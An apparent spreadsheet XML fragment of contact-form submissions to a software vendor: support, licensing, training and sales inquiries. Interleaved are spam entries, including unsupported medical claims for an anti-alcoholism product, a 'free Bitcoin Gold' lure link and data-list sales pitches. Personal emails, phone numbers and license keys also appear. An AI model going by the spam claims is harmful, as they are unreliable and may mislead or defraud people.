    <t>Прошли те времена, когда штукатурку использовали в качестве основания под новый облицовочный материал и для выравнивания неровностей стен, потолков и прочих частей помещения, внутри и снаружи, подробнее читайте на сайте [url=http://beton-cement-ru.ru]beton-cement-ru.ru[/url]</t>
  </si>
  <si>
    <t>Сегодня многие дачники отказываются от использования химикатов и используют принципы органического сельского хозяйства, позволяющего получать качественный урожай без применения синтетических удобрений и пестицидов. Читайте об этом подробнее на сайте [url=http://sovet-sadovody.ru]sovet-sadovody.ru[/url]</t>
  </si>
  <si>
    <t>please provide the  Documentum authorized distributors in Saudi Arabia urgently for a customer Lic renewal request.</t>
  </si>
  <si>
    <t>Препарат Алко Барьер – это обман и маркетинговый ход или средство действительно действует и способно помочь избавиться от алкоголизма?_x000D_
АлкоБарьер средство от алкоголизма оказывает положительное действие на печень сердце почки нервную систему Купить ..._x000D_
Алкобарьер средство от алкоголизма в Сасове. Существуют уже даже специальные препараты, которые могут облегчить похмельные Чем лечить ..._x000D_
лечение алкоголизма в японии лечение алкоголизма кодированием самое лучшее средство от алкоголизма АлкоБарьер средство от алкоголизма не ..._x000D_
Алкобарьер это средство от алкоголизма - новинка в лечении алкогольной зависимости. Купить алкобарьер в аптеке Санкт-Петербург._x000D_
 _x000D_
 _x000D_
Официальный сайт: http://alcovirin.bxox.info</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;strong&gt;Шведские стенки, спортивные комплексы для детей и взрослых &lt;/strong&gt;.&lt;br&gt; ДСК Лира, купить детский спортивный комплексЛира- «Спорт 96»  Шведские стенки. Детские спортивные комплексы. Гантельные ряды. Навесное оборудование для ДСК и шв. стенок. Маты. ДСК "Форумла здоровьяы" "Лира- 2 К Плюс" (13 цветов).   &lt;br&gt;  _x000D_
 [URL=http://shved-stenki.ru/shvedskaya-stenka-dlya-detej-kupit-novosibirsk/]Шведская стенка для детей купить новосибирск[/URL] [URL=http://sports-sites.ml/kak-pravilno-vybrat-shvedskuyu-stenku-dlya-rebenka/]Как правильно выбрать шведскую стенку для ребенка[/URL]  _x000D_
 &lt;i&gt;Шведскаястенкастурником— купить на  &lt;/i&gt;.&lt;br&gt; Каквыбратьдетский спортивный комплексдлядома?    Универсальный «агрегат»длязанятий физкультуройдома- это детский спортивный комплекс (ДСК). Польза его неоспорима, остается лишь опрос: какой ДСКвыбратьи на Веревочная лестница понравится детям старше 2 лет - залезать на нее сложнее, чем нашведскусютенку.   &lt;br&gt;  _x000D_
детская шведская стенка авито _x000D_
 _x000D_
 Шведская стенка гладиаторская сетка . Продажа, поиск, поставщики и магазины, цены в  кровать Пират со шведской стенкой и  комплекс с рукоходом №2 с турником и доской для пресса. Спортивный комплекс с рукоходом №2 предназначен для активных деток. Доставка по Украине до склада Интайм, доставка и установка по Киевыу бесплатно. Оплата - предоплата на карту или при получении (наложенный  Двухъярусная кровать Пират со шведской стенкой и  размеры (дл/шрв/с): - спальное место (дл/шир) – 190х80 см. - длинакровати- 200см. -шведская стенка(выс/шир) – 210х94см. -гладиаторская сетка ..&lt;br&gt; &lt;i&gt;Шведскаястенка: виды, плюсы, как выбрать, производители &lt;/i&gt;.&lt;br&gt;  _x000D_
  [URL=http://ru-sport.ga/shvedskaya-stenka-helena-maxi/]Шведская стенка helena maxi[/URL] [URL=http://shved-stenki.ru/shvedskaya-stenka-dlya-detej-2-goda-v-kvartiru/]Шведская стенка для детей 2 года в квартиру[/URL]  _x000D_
 Шведские стенки для детей и взрослых   За 6300 5090 руб! Отправка формы… По Нижнему Новгородвудень заказа. Среднее время по России 3-</t>
  </si>
  <si>
    <t>Support- _x000D_
We currently have RightFax server 9.4 and are moving from exchange server 2010 to office 365 and I need assistance In configuring this.</t>
  </si>
  <si>
    <t>Info re DM - Corporate business.</t>
  </si>
  <si>
    <t>To buy DRM softwares</t>
  </si>
  <si>
    <t>I seek a list of providers. I have used First Class in the past and am looking for a small providers, not a large one.</t>
  </si>
  <si>
    <t>Two things:_x000D_
1. When I want to log into my FirstClass on my mobile phone, I always have to reenter the password, which I do not want to do. How do I make it so that the password is automatic?_x000D_
2. On FirstClass on my mobile phone, I do not receive emails for new emails that I got. How do I make it so that I get notifications when I get a new email?</t>
  </si>
  <si>
    <t>The client needs to store corporate minute books electronically. The client needs to make incorporation documents available online. Could you describe your services?</t>
  </si>
  <si>
    <t>Jump to Состав средства от алкоголизма - Я вылечила мужа от алкоголизма простым способом! Избавляет от тяги к спиртному за 10 дней._x000D_
Где в Омске купить средство, напиток от алкоголизма (Alco Barrier)? Заказать, состав, инструкция по применению._x000D_
АлкоБарьер — эффективное средство от алкоголизма. Февраль 5, 2017, Статьи &amp;middot; 2 комментария. алкобарьер против алкоголизма. Алкоголизм – это ..._x000D_
Jan 5, 2017 - Алкобарьер средство от алкоголизма: состав, инструкция по применению, отзывы покупателей и отзыв врача, цена, где купить?_x000D_
Aug 21, 2017 - Сыворотка Алко Барьер – это средство от алкоголизма, который одинаково успешно применяется как для мужчин, так и для женщин._x000D_
 _x000D_
 _x000D_
Официальный сайт: http://alcovirin.bxox.info</t>
  </si>
  <si>
    <t>Interested on VIM training._x000D_
What’s the timing for Feb12 batch?_x000D_
Can the class be taken on personal lapeop at home since the class is virtual?_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Respected sir/madam, _x000D_
_x000D_
Greeting from Swayam Solution,_x000D_
_x000D_
_x000D_
My name is Jainam sarvaiya and I head up business development efforts at Swayam Solution in India._x000D_
_x000D_
I am looking at your profile and I found that you might be the right person to connect with on this regarding your business. If not, may be you could put me in touch with whoever handles that._x000D_
_x000D_
We are providing web design and Development, application development, mobile app development and digital marketing as per client’s requirement._x000D_
_x000D_
We can work together and also collaborate._x000D_
_x000D_
It would be great if we discuss with us on skype group to discuss about your business._x000D_
_x000D_
Awaiting for your reply, _x000D_
_x000D_
Thanks and Regards,_x000D_
Jainam Sarvaiya_x000D_
Sarvaiyajainam21@gmail.com_x000D_
Skype ID: Jainam Sarvaiya_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Any vacancy for fresher </t>
  </si>
  <si>
    <t>Привет! Класный у вас сайт _x000D_
Нашел прикольные сервера cs 1.6 на этом сайте: http://serveracss.net/ : _x000D_
[b] сервера кс 1 6 fy [/b] http://serveracss.net/game/cs _x000D_
[url=http://serveracss.net/game/csgo] сервера для тренировки аима в кс го [/url] _x000D_
[b] сервера css последняя версия [/b] http://serveracss.net/game/source _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://serveracss.net/server_info/174.51.15.192:64101/</t>
  </si>
  <si>
    <t>Всемирно известные и популярные чипсы можно делать не только из картофеля, но и из других продуктов. В данном рецепте их предлагается сделать сладкими, подробнее об этом читайте на сайте [url=http://zonakulinara.ru]zonakulinara.ru[/url]</t>
  </si>
  <si>
    <t>I need to update the email address that is linked to fax #8582027857. Currently, it's linked to Laura.whitson@petco.com, but it needs to be linked to housecalls@petcoach.co. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Need VIM rep to assist in new VIM Opportunity </t>
  </si>
  <si>
    <t>What is the current version of BiQuery and upgrade path from Bi version 10.5.0.49</t>
  </si>
  <si>
    <t>I need someone to respond back to me via email, need to cancel Rightfax.</t>
  </si>
  <si>
    <t>АЛКОВЕРИН АКТИВИРУЕТ РЕЖИМ АЛКОГОЛЬНОГО ОТТОРЖЕНИЯ _x000D_
С ALCOVIRIN выпить ПРОСТО НЕ УДАСТСЯ! _x000D_
 _x000D_
Это первый биогенный растительный комплекс, способствующий выработке непереносимости алкоголя при совместном приеме капель и спиртных напитков, вызывая тошноту и его полное отторжение организмом! _x000D_
 _x000D_
Кроме того, он оказывает мощное оздоровительное действие, устраняя алкогольную интоксикацию и способствуя восстановлению правильной работы органов и систем. _x000D_
 _x000D_
Официальный сайт: http://alcovirin.bxox.info</t>
  </si>
  <si>
    <t>Hello, I own a document management company and we are on the GSA Schedule. I want to be able to offer an Email Management and Electronic Records Solution to my clients. We would like to meet NARA standards for Electronic Records Management._x000D_
I would like to learn more about your product. Thank you.</t>
  </si>
  <si>
    <t>Interested in ECM solutions.</t>
  </si>
  <si>
    <t>Hi, I would like to know what is the price of Open text exstream._x000D_
Thanks</t>
  </si>
  <si>
    <t>Всем привет! _x000D_
Нашёл интересные новости: _x000D_
http://energysmi.ru/information-technology-it/22447-k-chempionatu-mira-po-futbolu-v-rossii-mogut-poyavitsya-miniatyurnye-bespilotniki.html [b] К Чемпионату Мира по футболу в России могут появиться миниатюрные беспилотники [/b] _x000D_
[url=http://energysmi.ru/news/8869-pora-govorit-o-raspade-ukrainy-ukrainskiy-politolog.html] Пора говорить о распаде Украины, - украинский политолог [/url] _x000D_
http://energysmi.ru/news/33681-shestero-ukrainskih-voennyh-pogibli-pri-popytke-proryva-na-yuge-dnr-voennyy-obozrevatel.html _x000D_
Новости политики Белоруссия Россия http://energysmi.ru/</t>
  </si>
  <si>
    <t>Faxes from computers are not going through.</t>
  </si>
  <si>
    <t>I'm currently working on a course for Pluralsight.com where your product is listed as a solution for cybersecurity forensics....I'm wondering if I can get permission to use a logo or screenshot within the video course. If you have one you want to be used, I'd love to get a copy of it.</t>
  </si>
  <si>
    <t>Buy Captiva software</t>
  </si>
  <si>
    <t>Interested in demo on the Edocs solution.</t>
  </si>
  <si>
    <t>Good day, _x000D_
_x000D_
I am contacting you with a company called Accurate Background in the hopes of completing an employment reference for a former employee with OPENTEXT out of SAO PAULO, BRAZIL.  Could you please provide me with the contact information of your Human Resources department or the designated contact who typically handles these requests? Any help would be greatly appreciated. _x000D_
_x000D_
Kind Regards</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h3&gt;стенка- Доска объявлений от частных лиц и  &lt;/h3&gt;.&lt;br&gt; &lt;u&gt;Шведские стенки &lt;/u&gt;.&lt;br&gt;  _x000D_
 [URL=http://shved-stenki.ru/detskij-sportivnyj-kompleks-rannij-start-kupit-b-u/]Детский спортивный комплекс ранний старт купить б/у[/URL] [URL=http://ru-sport.ga/kupit-detskij-sportivnyj-kompleks-v-kvartiru-v-internet-magazine-nedorogo/]Купить детский спортивный комплекс в квартиру в интернет магазине недорого[/URL]  _x000D_
 &lt;h2&gt;Купить детский спортивнный комплекс Д(СК)винтернет  &lt;/h2&gt;.&lt;br&gt; Если в одну то круглое, а если каждый раз в разные то квадратное? Я правильно понял? И сколько мтров веревки ушло ан такой канат? +1. 2года· xaTxa. Не помню точно, помню только что не хватило чуть чуть и доплетал нити около 20 см. +1. 2года· all-kesan. Настоящий Челябинский Мужик с  стенка своими руками - Pikabu&lt;/u&gt;.&lt;br&gt;  _x000D_
шведская стенка турник брусья скамья трансформер _x000D_
 _x000D_
 &lt;u&gt;Стенки шведские с турником, спортивные, деревянные  &lt;/u&gt;.&lt;br&gt; &lt;i&gt;Спортивные комплексы в интернет-магазине развиваюжщих игр  май 2016 ... Давно раздумывала над покупкой шведской стенки, ведь в семьерастёт 2 мальчика. Остановила свой выбор на этой. Понравилось , что ширина её всего 49 см, т. е. вполне может вписаться в любую квартиру. Высотаа 2 метра 27 см. Крепление к стене. Читать далее (5)  стенка РОМАНА Комета-2 купить в Нижнем Новгороде&lt;/h4&gt;.&lt;br&gt;  _x000D_
  [URL=http://shved-stenki.ru/turnik-dlya-doma-nastennyj-prostoj/]Турник для дома настенный простой[/URL] [URL=http://sport-shved-turnik.tk/detskij-sportivnyj-kompleks-svoimi-rukami/]Детский спортивный комплекс своими руками[/URL]  _x000D_
 шведская стенка - Доска объявлений от частных лиц и   Спорт и отдых  Компаниря. Воронеж. Сегодня 09:02. В избранное. Шведская стенка. 5 400 руб. Товарыдлядетей и игрушки. Шведская стенка Атлетдлядетей в Воронеже. 2 900 руб.  /voronezhskaya_oblast?q=шведская+стенка &lt;br&gt; ШведскиестенкSиport-Style - Google+  Сообществах  СИМФЕРОПОЛЬ,  160 (возле оптового склада "АНГАР" и магазина "АВТОШИНЫ"). Уже в наличии в Симферополе качественныешведскиест</t>
  </si>
  <si>
    <t xml:space="preserve">Mar 14, 2017 Switched at Birth: Season 5 Episode 7 - Memory (The Heart) - The 100th episode.. Season 5 Episode 6 Four Ages in Life. March 7th, 2017. Phoebe's Songs || Songs from season: 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 This document may be posted on internet sites other than www.friends-tv.org only if ..... 1.17 The One With Two Parts, part 2 - What song (that went "In a New York Minute. ...... Rachel then opens a shoe box she thinks is a present, which actually contains  _x000D_
[url=http://watchtvonline.io/caught-in-the-act-dates-behind-the-scenes-schedule-promos/]view publisher site[/url] _x000D_
3 Mar 2016 Watch The Mysteries Of Laura Online Free. Based on the popular Spanish series Los Misterios De Laura it follows the life and relationships of a TV Chef Paul Wahlberg Burger Tips from Boston Restaurant popular reality television series, but Paul Wahlberg isn't your ordinary chef. Massachusetts, and later Wahlburgers, a better-burger joint co-owned by his two </t>
  </si>
  <si>
    <t xml:space="preserve">KC Access Request ._x000D_
Product Line :  Content Server /Extended ECM Platform_x000D_
End User Number:   10020929_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are missing current invoices for payment... trying to get access on line to pull invoice.  Is this possible or can we get an email with invoices monthly to process payments?  Account # for Naphcare = 140985 - Missing Dec and Jan invoices </t>
  </si>
  <si>
    <t>Holleo_x000D_
_x000D_
quote magenation please.</t>
  </si>
  <si>
    <t>I purchased Exceed, confirmed my registration and I was able to logintomy opentext account. However, when I go to mysupport, I am told I don't have access! Therefore I am unable to download and install Exceed. Please advise.</t>
  </si>
  <si>
    <t>Good morning, i am writing from PWSA Wine company, to subscribe for your fax service, please be kind to tell us more about how we can subscribe and the cost for sending faxes in PA._x000D_
_x000D_
Warm greeting,_x000D_
_x000D_
Audrey Rotell_x000D_
Pennsylvania Wine &amp; Spirits Association_x000D_
2000 Hamilton St., PMB #518_x000D_
Philadelphia, PA 19130_x000D_
Phone: 484-509-9296_x000D_
Fax: 888-451-1869_x000D_
www.pawineandspiritsassn.com</t>
  </si>
  <si>
    <t>Looking for an End User class for Documentum.  We are using version 6.8.  In August EMC offered the online class: Documentum Records Manager End User Training 1-8501 [24011].  I would like to train 10-15 people.</t>
  </si>
  <si>
    <t>Need to do bar code testing for JCPenney</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to be put in touch with a Documentum partner supporting Government clients.  </t>
  </si>
  <si>
    <t xml:space="preserve">About Xpresso for Word Product:_x000D_
We have a VM where the software stopped working, when we go to see the licence information, it like if the key are not activated and we got these information:_x000D_
_x000D_
Request Code : 8fbecde7bcad9341820e4083110fbbcc7bc8c28dd9370a035079456d0564_x000D_
_x000D_
Thanks_x000D_
---------------------------------------------------------------------------------------------------------------------------------------------------_x000D_
_x000D_
Old information we have from 2016 about our two licences._x000D_
_x000D_
_x000D_
Mathieu.Carrier@lacapitale.com _x000D_
 _x000D_
License #:  18A1F12A588269C967036E6F8AF84C679C1566396585FA5EE76442A3697652DCF47868D9DEEDB7A9 _x000D_
Serial #:  5AB84AB305D0A22D3AA2A8F51529FD4B _x000D_
Request Code:  8fbecde7bcad9341820e4083110fbbcc7bc8c28dd9370a035079456d05641ef6 _x000D_
For Product: xPresso For Word_x000D_
_x000D_
francois.delisle@lacapitale.com_x000D_
 _x000D_
License #:  18A1F12A588269C967036E6F8AF84C67C2AA212223FE0F3E1E7FD9EE98797F1559547F588C119F9D _x000D_
Serial #:  5AB84AB305D0A22D3AA2A8F51529FD4B _x000D_
Request Code:  8fbecde7bcad9341820e4083110fbbcc912c1921aa2e1af213285c4f4df5e372 _x000D_
For Product: xPresso For Word_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
I am reaching out to check your interest in acquiring our recently verified install based accounts of SAP Users._x000D_
_x000D_
We have counts for following SAP products ,_x000D_
_x000D_
•	SAP HANA	•	SAP CONCUR_x000D_
•	SAP CRM	•	SAP ERP Systems_x000D_
•	SAP Business One	•	SAP Success Factors_x000D_
_x000D_
_x000D_
This compiled record of SAP Users include details of Current Customers , Users and Clients which can be used for email marketing campaign, Tele-marketing campaign _x000D_
_x000D_
and other marketing initiatives for unlimited usages._x000D_
_x000D_
_x000D_
Let me know your interest and I will get back to you with more relevant information. _x000D_
 _x000D_
Look forward to your response._x000D_
 _x000D_
Regards,_x000D_
_x000D_
_x000D_
Ana Martin_x000D_
Demand Generation Manager_x000D_
Connect Prospects Inc. _x000D_
</t>
  </si>
  <si>
    <t>verification</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Pfizer Valued Supplier, _x000D_
We have received a request to add/update or Easylink Services USA’s information to Pfizer’s supplier system. We require the supporting documentation listed below to proceed with this request. Please respond with the information required at your earliest convenience in order to avoid any delays with transactions (including payments, invoice processing or purchase orders). .  _x000D_
_x000D_
To complete this task, a copy of your organization’s current  W-9 form * is required; would you please forward a signed and dated copy. Contact me for a copy of the 2017 Rev W-9 if you would like a blank copy.***In addition, can you tell me if the name of the company is it Easylink Services Corporation or Easylink Services USA . Are these the same company. And would you like the name changed to Opentext?***_x000D_
_x000D_
*Note: the W-9 Form MUST be Rev 2017 or later (per IRS direction, no earlier Rev/versions can be accepted). Please visit the IRS website for more details and an updated form if necessary: http://www.irs.gov/pub/irs-pdf/fw9.pdf. _x000D_
_x000D_
_x000D_
Thank you and    _x000D_
Best regards,_x000D_
-Daniel_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Is 3-2513 RightFax Administrator 1 Training online training that can be completed any day? Do the students need to be onsite?</t>
  </si>
  <si>
    <t>I still have no access to mysupport even I received a email saying I can access to it...</t>
  </si>
  <si>
    <t>Hi, I'm a Software Reseller. I want to order dwg viewer for on of my customers. Who can I do this? My Customer is using MS Terminalserver. Is there a licensing issue on Terminalservers. We need 10 licenses for 5-6 active users. On the Terminalsserver areworking 30 employees. Thanks in advance. Best regards.</t>
  </si>
  <si>
    <t>Recently I cannot get to my support page. When I log in I go to account settings. When I click My Support it stays on the account settings. So I can't see My Tickets. Using Firefox on Win 7</t>
  </si>
  <si>
    <t>No access to create a support ticket for our customers._x000D_
ING BE, ING NL, PGD (luxembourg) _x000D_
Please help</t>
  </si>
  <si>
    <t>_x000D_
Hi,_x000D_
_x000D_
Hope you doing great today._x000D_
_x000D_
I’m Robert, kind gestures for showing interest in our mail. We are a list compilers and dominant players in Cloud-optimized Communications Technology Solutions Providers List._x000D_
_x000D_
Would you like to have a view in our updated database that will help in providing you with new buyers for your valuable products &amp; services?_x000D_
_x000D_
Titles/Functions:_x000D_
_x000D_
•	CTOs /Presidents/VPs_x000D_
•	Business Owners_x000D_
•	Development Managers_x000D_
•	Operations Managers / IT Managers _x000D_
•	Call/Campaign Managers_x000D_
•	Application/Software Developers_x000D_
•	Mobile Operators/System Integrators _x000D_
•	Solution/System Architects _x000D_
•	System/Data Engineers _x000D_
•	Communications Service Providers_x000D_
•	Enterprise Solution Providers_x000D_
•	MSPs/VARs Solution Providers_x000D_
•	Cloud Application Providers_x000D_
•	Consultants/Cloud Brokers_x000D_
•	Mobile Vas Provider_x000D_
•	IVR Solution Provider_x000D_
•	Dealer/Network Management_x000D_
•	Document/Incident Management _x000D_
•	Session Border Controllers_x000D_
•	Others allied to this field_x000D_
_x000D_
Segments:_x000D_
              _x000D_
•	Cloud Resellers and Partners/ Suppliers_x000D_
•	Automatic-call-distributor_x000D_
•	Advertising Agencies_x000D_
•	Telecom Equipment and Software_x000D_
•	Media/Dialogic Servers_x000D_
•	Optimization, Network Congestion Solutions_x000D_
•	Application Development_x000D_
•	UC for Service Providers_x000D_
•	Internet &amp; Conferencing Service Providers _x000D_
•	Contact Center Transformation_x000D_
•	App Store/Call Center_x000D_
•	Financial Services_x000D_
•	Automated-self-attendant_x000D_
•	Call Recording/Router_x000D_
•	Managed Services/Managed Vas Services_x000D_
•	Telecom Value Added Services_x000D_
•	Others	_x000D_
_x000D_
Please fill in your exact Target criteria in the below mentioned format, so that I can run counts and get back to you with samples and benefits for your review.	_x000D_
_x000D_
Target Titles: _________ Target Industry: ______________   Target Geography: ____________x000D_
_x000D_
We have complete contacts details and verified e-mail address across all industry._x000D_
_x000D_
Our list includes: Name, Titles, Company Name, Permission Based E-mail address, Contact number, Address and many more._x000D_
 _x000D_
Gua</t>
  </si>
  <si>
    <t>Do you have any office or authorized service provider for Documentum ApplicationXtender in Bangkok? We may need the support for one of our project. Thanks.</t>
  </si>
  <si>
    <t>temptest22054855@gmail.com</t>
  </si>
  <si>
    <t>Get free Bitcoin Gold right now! _x000D_
&lt;a href=https://bitcoingolde.org&gt;bitcoin gold logo&lt;/a&gt;</t>
  </si>
  <si>
    <t>Interested in your B2B product. We would like to see what options are available for our E-Commerce. We are currently on Seeburger system.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, my name is Mary Wingo and I manufacture premium woven and printed labels and patches with the best craftsmanship in the industry. I can provide you not only with excellent service and pricing, but I can help with special requests and projects that are difficult to fulfill or engineer._x000D_
_x000D_
You can always call me at 325-515-4103 (I work out of Texas, but I do work internationally) or just get back by email if you have any artwork or any questions whatsoever. You will completely be taken care of by my world-class team, as we have been serving our elite clients for 10 years. _x000D_
_x000D_
I do have some beautiful work to share with you if you are interested. Would you like for me to send you more information or a link to my gallery? _x000D_
_x000D_
Mary Wingo  _x000D_
13359 North Highway 183_x000D_
Suite 406-577_x000D_
Austin TX 78750_x000D_
</t>
  </si>
  <si>
    <t>We are a small company with SAP ERP going to S/4 soon. We are interested in storing files in sales order item level and other objects via Fiori UI and external system via API. If you have solutions that can do this priced for small company, please contact me. Thank you.</t>
  </si>
  <si>
    <t>My use case would be to connect Windows Server 2016 app servers to the AWS EFS services.  IIS would be hosting web applications who's files would be stored in EFS and accessed through the OpenText NFS client._x000D_
_x000D_
Is this scenario tested and supported?  Does your client work with EFS and without performance issues?</t>
  </si>
  <si>
    <t>Heartland has been purchasing Open Text to resell through Dell EMC/Tech Data.  We need to develop a relationship with Open Text directly.  Depending on the terms and conditions of the Reseller Agreement, we may want to participate as an Agent.  We have one customer who needs to renew now, so time is of the essence.  Thank you.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I'm interested in obtaining training on the following:_x000D_
_x000D_
Smart UI, Perspectives and Widgets within Content Server release 16. Could you recommend a course from the course catalogue that would be best suited to this subject? I would like to know how to use the SMART UI, as well as administer it (build and edit perspectives as a landing page and for content server containers, understand how rules can be applied, as well as how to configure widgets)._x000D_
_x000D_
If you could provide a recommendation to me via email, I would appreciate it._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Greg</t>
  </si>
  <si>
    <t>Trying to determine whether we have a support agreement or it has lapsed for some unknown reason to me.  Software SUID:  50167-12352</t>
  </si>
  <si>
    <t>We are looking for a solution that would help us manage RFI's and RFP's._x000D_
Our intention is to be able to use an online solution that would permit vendors (advertising agencies) to respond to questions (may include text, spreadsheets, video, images). This same platform would need to enable us to share the responses in confidentiality to 20-40 stakeholders who would rate and comment each responses. The system would have the ability to aggregate the responses and comments and would populate a result based on the weight or value of each questions and multiple scoring of each response.</t>
  </si>
  <si>
    <t xml:space="preserve">Need a quote for services_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to align a strategic partnership that provides a 30% profit share without any upfront cost, target quota or commitment. </t>
  </si>
  <si>
    <t xml:space="preserve">Was looking to get some pricing for fax to email service and take a look at the portal and wondering if you can accept a port of DIDs and provide new DIDs. </t>
  </si>
  <si>
    <t>We would like to set up meeting to discuss your Life Sciences offerings and how they are responding to changes in regulatory environment.    Looking forward to hearing back from you.</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, _x000D_
_x000D_
I am contacting you with a company called Accurate Background in the hopes of completing an employment reference for a former employee with Opentext out of SAO PAULO BRAZIL.  Could you please provide me with the contact information of your Human Resources department or the designated contact who typically handles these requests? Any help would be greatly appreciated. _x000D_
_x000D_
Kind Regards,_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Digital Asset Management Software Users?_x000D_
_x000D_
This list Contains Company name, Web address, Contact name, Phone number, Email address, Title, physical address, City, State, Zip Code, Country, Phone number, Fax Number, Employee size._x000D_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</si>
  <si>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Good afternoon, _x000D_
_x000D_
I would like to hear more about Documentum to manage and store our semi-active and inactive files. Please call in the morning between 9:45 and 11am or email me to set up a different time._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Annie Chevalier</t>
  </si>
  <si>
    <t>Want to check to see if there will be a makeup session for the GCS attibute sessions from 1-24-18 as I was unable to attend</t>
  </si>
  <si>
    <t>Interested in adding the encryption module to our current RightFax product. Need to have pricing to pass on to the appropriate people. Sean</t>
  </si>
  <si>
    <t>Good morning, i am writing from PWSA Wine company i am writhing to subscribe for your fax broadcasting service, please be kind to tell us more about how we can subscrib and the cost for sending faxes in PA._x000D_
_x000D_
Warm greeting,_x000D_
Audrey Rotell_x000D_
Pennsylvania Wine &amp; Spirits Association_x000D_
2000 Hamilton St., PMB #518_x000D_
Philadelphia, PA 19130_x000D_
Phone: 484-509-9296_x000D_
Fax: 888-451-1869_x000D_
www.pawineandspiritsassn.com</t>
  </si>
  <si>
    <t>We are currently in the process of examining the possibilities of a drawing management solution that gives us the ability to manage the relationships between as-built redlines, engineering project drawings (IFC, IFT, record, etc.), engineer sealed drawings, and drawing masters (AutoCAD DWG). This drawing management solution should also give us the ability to manage concurrent engineering workflows, create redlines in the software or provide integration with a redline program (bluebeam, etc.), and integration with AutoCAD and Inventor. _x000D_
_x000D_
Also, Glencore INO IT only supports Microsoft platforms (Microsoft SQL, SSRS, IIS, .NET, etc.), and do not support Oracle or other development platforms. Proprietary platforms are acceptable, as long as they are covered by the support model for the software. _x000D_
_x000D_
Do you have demonstration videos of a platform that is capable of providing the above requirements so that we can get a better idea of the capabilities that might be available to us.</t>
  </si>
  <si>
    <t>Hope you are well.&lt;br&gt; &lt;br&gt;I was surfing your website. When we search for any keyword pertaining to your domain, your website does not come on the first page of Google. So how would people come to know about your website? If you want your website to appear on the first page of Google then please let me know. We can provide you certain Top 10 Google rankings. Working with SMO can help you strengthen your brand and boost visibility, as well as generate inquiry and increase sales.&lt;br&gt; &lt;br&gt;Please reply for more info.</t>
  </si>
  <si>
    <t>I would like to purchase Myriad File Viewer.</t>
  </si>
  <si>
    <t xml:space="preserve">CRA would like to start using a document management system and I'd like to speak with a representative about our options.  </t>
  </si>
  <si>
    <t>Hello, my account does not work properly. I am not able to open tickets or view the "My Support" area anymore. Please help. I need to open tickets for our customers to support them in their daily business.</t>
  </si>
  <si>
    <t>Interested in Documentum invoice routing I understand the product used to be part of EMC</t>
  </si>
  <si>
    <t>Hi, _x000D_
I have a request from a TELCO customer, who requires a new E-Bill Platform to replace the existing legacy E-bill platforms for mobile and fixed. Briefly, _x000D_
•	E-Bill (mobile &amp; fixed) to a Consolidated E-Bill functionalities covering retail &amp; business customers_x000D_
•	Processing engine of source billing data (mobile &amp; fixed)_x000D_
•	Generation on the fly .pdf and .html files_x000D_
•	High-volume document production_x000D_
_x000D_
•	Increased Performance compared to legacy E-Bill systems_x000D_
We kindly ask you to check the document and advise if it’s of your interest. _x000D_
Thanx &amp; br, _x000D_
Dimitrios</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in cataloging, archiving and converting existing paper records into electronic format for easy access, indexing and retrieval </t>
  </si>
  <si>
    <t>Need to replace 2 Opentex Fax Gateway 308 - I have a total of 11 fax lines with possibly more coming. I was looking at RightFax Express - what are my options?</t>
  </si>
  <si>
    <t xml:space="preserve">Olá, tudo bem?_x000D_
_x000D_
Sou analista de marketing do GestãoClick (https://gestaoclick.com.br/), um software de gestão empresarial. Percebi no seu website um conteúdo diversificado, de qualidade e que se assemelha a temática da minha empresa. Sendo assim, demonstro através deste email o interesse em escrever um blog original sobre economia, vendas, empreendedorismo, atualidades ou uma temática da sua preferência a fim de realizar um guest post no seu site ou realizar a troca de links._x000D_
_x000D_
Acredito que a parceria será de mútua vantagem, já que caso você tenha interesse também pode publicar em nosso blog externo ao sistema. Dessa forma, ambas empresas ganham um novo conteúdo que interessa ao seu público alvo, além de mais palavras chaves anexadas ao nome da empresa e um melhor posicionamento no ranque de pesquisas._x000D_
_x000D_
É válido ressaltar que já escrevi artigos para diversas outras grandes empresas e possuo qualificação para isso._x000D_
_x000D_
Desde já agradeço pela atenção,_x000D_
_x000D_
Att Equipe GestãoClick_x000D_
_x000D_
Skype: marketing@gestaoclick.com.br_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
_x000D_
I am an intern at TransPerfect Legal Solutions. TransPerfect is a leading global provider of e-discovery and legal support services with offices in over 90 cities worldwide._x000D_
_x000D_
In addition to providing legal support for e-discovery and e-discovery technology, TransPerfect is looking to expand its legal support services into corporate and transactional technology such as contract discovery/review._x000D_
_x000D_
Similarly to its e-discovery services, TransPerfect would offer extensive support on the use and implementation of a particular contract discovery/review tool. We are therefore on the lookout for a provider of such tools with whom TransPerfect could partner with to resell its contract discovery/review solutions to TransPerfect’s clients._x000D_
_x000D_
Since OpenText offers contract discovery/review technology, we would like to schedule a demo of OpenText Perceptiv and discuss the possibility for collaboration._x000D_
_x000D_
We have seen that OpenText will be present at the Tradeshow during the LegalTech conference in New York in the end of January. Since TransPerfect will also be present at the conference, I would propose to meet with your representatives at the Tradeshow in order to discuss the above._x000D_
_x000D_
Could you kindly let me know if a demo on 31/01 afternoon during the conference would work on your end?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Best regards,_x000D_
Remy_x000D_
</t>
  </si>
  <si>
    <t>looking at replacing right fax 10.6 with cloud or hybrid solution._x000D_
this is the third request form. There will not be another.   may providers available</t>
  </si>
  <si>
